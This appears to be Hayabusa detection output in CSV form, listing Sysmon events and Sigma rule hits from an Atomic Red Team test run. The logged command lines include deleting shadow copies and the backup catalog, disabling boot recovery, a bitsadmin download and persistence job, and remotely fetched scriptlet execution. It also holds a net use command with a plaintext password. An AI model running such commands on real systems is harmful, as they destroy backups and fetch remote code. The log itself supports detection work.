2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,Persis,New DLL Added to AppInit_DLLs Registry Key,,rules/sigma/registry_event/sysmon_new_dll_added_to_appinit_dlls_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:37.168 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - via Windows Load | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs: DWORD (0x00000001) | Process: C:\Windows\system32\reg.exe | PID: 6056 | PGUID: 747F3D96-D809-5D31-0000-00105C262B00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:37.168 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:37.215 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 980 | PGUID: 747F3D96-D809-5D31-0000-001072292B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:40.691 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6896 | PGUID: 747F3D96-D80C-5D31-0000-0010223C2B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:40.706 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: vssadmin.exe delete shadows /all /quiet | Process: C:\Windows\System32\vssadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet"" | LID: 0x50951 | PID: 1124 | PGUID: 747F3D96-D80C-5D31-0000-0010843F2B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:40.706 +09:00,MSEDGEWIN10,1,critical,Evas | Impact,Shadow Copies Deletion Using Operating Systems Utilities,,rules/sigma/process_creation/proc_creation_win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:40.863 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1348 | PGUID: 747F3D96-D80C-5D31-0000-001005542B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:45.585 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog -quiet"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4500 | PGUID: 747F3D96-D811-5D31-0000-001000632B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:45.585 +09:00,MSEDGEWIN10,1,critical,LatMov | Disc | Evas | Impact,WannaCry Ransomware,,rules/sigma/process_creation/proc_creation_win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: wbadmin.exe delete catalog -quiet | Process: C:\Windows\System32\wbadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog -quiet"" | LID: 0x50951 | PID: 6160 | PGUID: 747F3D96-D811-5D31-0000-001061652B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,critical,Evas | Impact,Shadow Copies Deletion Using Operating Systems Utilities,,rules/sigma/process_creation/proc_creation_win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,critical,LatMov | Disc | Evas | Impact,WannaCry Ransomware,,rules/sigma/process_creation/proc_creation_win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:45.773 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wbengine.exe"" | Process: C:\Windows\System32\wbengine.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 6064 | PGUID: 747F3D96-D811-5D31-0000-0010726A2B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:45.958 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\vds.exe | Process: C:\Windows\System32\vds.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3184 | PGUID: 747F3D96-D811-5D31-0000-0010147C2B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:46.112 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2948 | PGUID: 747F3D96-D812-5D31-0000-0010AC892B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:46.302 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Schedule.Service Module Load | Image: C:\Windows\System32\taskschd.dll | Process: C:\Windows\System32\wbengine.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 6064 | PGUID: 747F3D96-D811-5D31-0000-0010726A2B00 | Hash: SHA1=BE65E71FC691867FFA1D3129CEAB67A0688A08CB,MD5=9A0C13D674AB2D72193653EF38D8FB8E,SHA256=15817A5CB717D4846AE753A27CD8859BCE63004143083027FA5EC9324DFC5188,IMPHASH=5694D579C32F1A7EB5FA54148C174C38",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:51.816 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6508 | PGUID: 747F3D96-D817-5D31-0000-001064AD2B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:51.865 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures | Process: C:\Windows\System32\bcdedit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"" | LID: 0x50951 | PID: 396 | PGUID: 747F3D96-D817-5D31-0000-001097B02B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:51.865 +09:00,MSEDGEWIN10,1,high,Impact,Modification of Boot Configuration,,rules/sigma/process_creation/proc_creation_win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:51.997 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled no"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6216 | PGUID: 747F3D96-D817-5D31-0000-001049B42B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:51.997 +09:00,MSEDGEWIN10,1,critical,LatMov | Disc | Evas | Impact,WannaCry Ransomware,,rules/sigma/process_creation/proc_creation_win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bcdedit.exe /set {default} recoveryenabled no | Process: C:\Windows\System32\bcdedit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled no"" | LID: 0x50951 | PID: 5984 | PGUID: 747F3D96-D817-5D31-0000-0010B7B62B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,critical,LatMov | Disc | Evas | Impact,WannaCry Ransomware,,rules/sigma/process_creation/proc_creation_win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,high,Impact,Modification of Boot Configuration,,rules/sigma/process_creation/proc_creation_win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:52.046 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7040 | PGUID: 747F3D96-D817-5D31-0000-0010C8BA2B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:57.227 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sdelete.exe C:\some\file.txt"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1632 | PGUID: 747F3D96-D81D-5D31-0000-0010B8CA2B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:47:57.274 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7080 | PGUID: 747F3D96-D81D-5D31-0000-0010D7CD2B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:04.103 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6736 | PGUID: 747F3D96-D824-5D31-0000-001023F42B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:04.131 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1 | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" | LID: 0x50951 | PID: 1540 | PGUID: 747F3D96-D824-5D31-0000-001075F62B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:04.131 +09:00,MSEDGEWIN10,1,medium,Evas | Persis,Bitsadmin Download,,rules/sigma/process_creation/proc_creation_win_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:05.365 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5808 | PGUID: 747F3D96-D825-5D31-0000-0010CF222C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:30.640 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D83E-5D31-0000-0010F0D02E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:30.660 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /create AtomicBITS | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS"" | LID: 0x50951 | PID: 4508 | PGUID: 747F3D96-D83E-5D31-0000-001042D32E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:30.799 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4036 | PGUID: 747F3D96-D83E-5D31-0000-0010A2D72E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:30.799 +09:00,MSEDGEWIN10,1,medium,Evas,Monitoring For Persistence Via BITS,,rules/sigma/process_creation/proc_creation_win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1 | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" | LID: 0x50951 | PID: 3732 | PGUID: 747F3D96-D83E-5D31-0000-0010AAD92E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,medium,Evas | Persis,Bitsadmin Download,,rules/sigma/process_creation/proc_creation_win_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,medium,Evas,Monitoring For Persistence Via BITS,,rules/sigma/process_creation/proc_creation_win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:30.900 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7072 | PGUID: 747F3D96-D83E-5D31-0000-001088DE2E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:30.917 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1 | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1"" | LID: 0x50951 | PID: 3204 | PGUID: 747F3D96-D83E-5D31-0000-0010DAE02E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:31.012 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4332 | PGUID: 747F3D96-D83E-5D31-0000-001046E52E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:31.041 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /complete AtomicBITS | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS"" | LID: 0x50951 | PID: 388 | PGUID: 747F3D96-D83F-5D31-0000-0010A2E72E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:31.134 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3760 | PGUID: 747F3D96-D83F-5D31-0000-001001EC2E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:31.157 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /resume AtomicBITS | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS"" | LID: 0x50951 | PID: 3704 | PGUID: 747F3D96-D83F-5D31-0000-001053EE2E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:31.240 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4888 | PGUID: 747F3D96-D83F-5D31-0000-00105EF22E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:36.834 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7140 | PGUID: 747F3D96-D844-5D31-0000-001075082F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:36.882 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct | LID: 0x50951 | PID: 2484 | PGUID: 747F3D96-D844-5D31-0000-0010C70A2F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:36.882 +09:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:37.264 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2624 | PGUID: 747F3D96-D845-5D31-0000-001098212F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:41.050 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2096 | PGUID: 747F3D96-D849-5D31-0000-0010914D2F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:41.050 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious Listing of Network Connections,,rules/sigma/process_creation/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:41.085 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator | LID: 0x50951 | PID: 3284 | PGUID: 747F3D96-D849-5D31-0000-0010E54F2F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:41.085 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious Listing of Network Connections,,rules/sigma/process_creation/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
